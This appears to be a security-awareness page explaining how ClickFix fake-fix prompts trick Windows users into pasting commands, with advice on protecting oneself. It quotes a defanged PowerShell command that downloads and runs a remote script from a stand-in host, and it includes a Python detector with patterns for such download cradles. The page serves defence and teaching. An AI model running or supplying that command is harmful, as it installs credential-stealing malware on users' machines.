How ClickFix Works

ClickFix is a social engineering attack that tricks you into running malicious code on your own computer. Here's exactly how it works, step by step.

Step 1

You Visit a Compromised Website

You might click a link in an email, a search result, or even visit a legitimate website that's been hacked. The page looks normal at first, but then something appears to go wrong.

Common Scenarios:

  • Fake CAPTCHA: "Click here to verify you're human"
  • Browser Error: "Your browser needs an update to view this page"
  • Video Conference: "Connection error - please fix to join the meeting"
  • Document Viewer: "This PDF cannot be displayed. Click to fix."

Step 2

The Fake "Fix" Instructions

A prompt appears with very specific instructions. It usually says something like:

1. Press the Windows key and R key at the same time

2. Press Ctrl + V to paste

3. Press Enter

Why this is dangerous:

The Win + R combination opens the Windows "Run" dialog, which is a powerful system tool. It can run any program or command on your computer. When you press Ctrl + V, you're pasting a command that the malicious website secretly copied to your clipboard.

Step 3

The Malicious Command Executes

When you paste and press Enter, you're running a command that looks something like this:

Real ClickFix Payload Example (defanged)
⚠️ Malicious Code Example - This is a real-world attack payload (defanged for safety). Do not execute.
powershell -windowstyle hidden -ExecutionPolicy Bypass -Command "IEX(New-Object Net.WebClient).DownloadString('hxxps://malicious-site[.]com/payload.ps1')"

What each part does:

  • powershell: Launches PowerShell, a powerful command-line tool built into Windows
  • -windowstyle hidden: Hides the window so you don't see what's happening
  • -ExecutionPolicy Bypass: Skips PowerShell's execution policy, the safety setting that would normally restrict which scripts can run
  • IEX: Short for "Invoke-Expression"; runs whatever code it is given
  • New-Object Net.WebClient: Creates a tool to download files from the internet
  • DownloadString('hxxps://...'): Downloads a malicious script from the attacker's server as text, which IEX then runs immediately
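
For defenders, the parts broken down above can be checked for in logged command lines. The following Python triage sketch is an added example, not part of the original page; it also covers abbreviated parameter forms such as -w and -ep, which goes beyond the single payload shown. The function names, the alert threshold and the second and third sample lines are assumptions constructed for illustration.

```python
import re

# Parameter names that powershell.exe accepts by any unambiguous prefix
# (-w, -win, -ex ...). encodedcommand/command are listed so -e and -c are not misread.
PARAMS = ("windowstyle", "executionpolicy", "encodedcommand", "command")
ALIASES = {"ep": "executionpolicy"}  # short alias for -ExecutionPolicy
# parameter -> (value of interest, indicator name), following the page's breakdown
SUSPICIOUS = {
    "windowstyle": ("hidden", "hidden window"),
    "executionpolicy": ("bypass", "execution policy bypass"),
}
PATTERNS = {
    "invoke-expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "download cradle": re.compile(r"net\.webclient|\.downloadstring\s*\(", re.I),
}
ALERT_AT = 3  # assumed threshold: indicators needed before a line is reported

def expand_flag(token):
    """Map -w / -win / -WindowStyle to the full parameter name, or None if unclear."""
    if not token.startswith(("-", "/")):
        return None
    name = token.lstrip("-/").lower()
    if name in ALIASES:
        return ALIASES[name]
    matches = [p for p in PARAMS if name and p.startswith(name)]
    return matches[0] if len(matches) == 1 else None  # ambiguous (-e) -> None

def clickfix_indicators(cmdline):
    """Return the sorted names of the indicators present in one command line."""
    hits = {name for name, rx in PATTERNS.items() if rx.search(cmdline)}
    tokens = cmdline.split()
    for flag, value in zip(tokens, tokens[1:]):
        wanted = SUSPICIOUS.get(expand_flag(flag))
        if wanted and value.strip("\"'").lower() == wanted[0]:
            hits.add(wanted[1])
    return sorted(hits)

def triage(cmdlines):
    """Return (command line, indicators) for every line at or above ALERT_AT."""
    scored = ((c, clickfix_indicators(c)) for c in cmdlines)
    return [(c, h) for c, h in scored if len(h) >= ALERT_AT]

# Sample input: the page's defanged payload, then two constructed lines
# (an abbreviated variant with a placeholder URL, and a benign scheduled script).
SAMPLES = [
    r'''powershell -windowstyle hidden -ExecutionPolicy Bypass -Command "IEX(New-Object Net.WebClient).DownloadString('hxxps://malicious-site[.]com/payload.ps1')"''',
    r'''powershell -w hidden -ep bypass -c "iex (New-Object Net.WebClient).DownloadString('hxxps://example[.]invalid/a.ps1')"''',
    r'''powershell -ExecutionPolicy RemoteSigned -File C:\Scripts\backup.ps1''',
]
```

Calling triage(SAMPLES) reports the first two lines with all four indicators and leaves the benign scheduled script unreported.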

Step 4

The Malware Installs

The downloaded script typically does one or more of the following:

  • Steals your passwords - Searches your browser's saved passwords and sends them to the attacker
  • Steals your cookies - Takes your login sessions so the attacker can access your accounts
  • Searches for cryptocurrency wallets - Looks for Bitcoin, Ethereum, and other crypto wallet files
  • Takes screenshots - Captures what's on your screen
  • Installs a backdoor - Gives the attacker permanent remote access to your computer

Real Malware Families Distributed via ClickFix:

  • Lumma Stealer - Most common, steals passwords and cryptocurrency
  • Vidar Stealer - Targets browser data and crypto wallets
  • DarkGate - Remote access trojan that gives full control of your PC
  • AsyncRAT - Another remote access tool used for surveillance

How to Protect Yourself

  1. Never paste commands from websites - No legitimate website will ever ask you to open the Run dialog and paste a command
  2. Be suspicious of "fix" instructions - Real technical problems don't get fixed by pasting mysterious commands
  3. Check the URL - Real Google, Microsoft, or Facebook pages won't show these prompts
  4. When in doubt, close the tab - If something feels off, just close the browser tab and navigate to the site directly
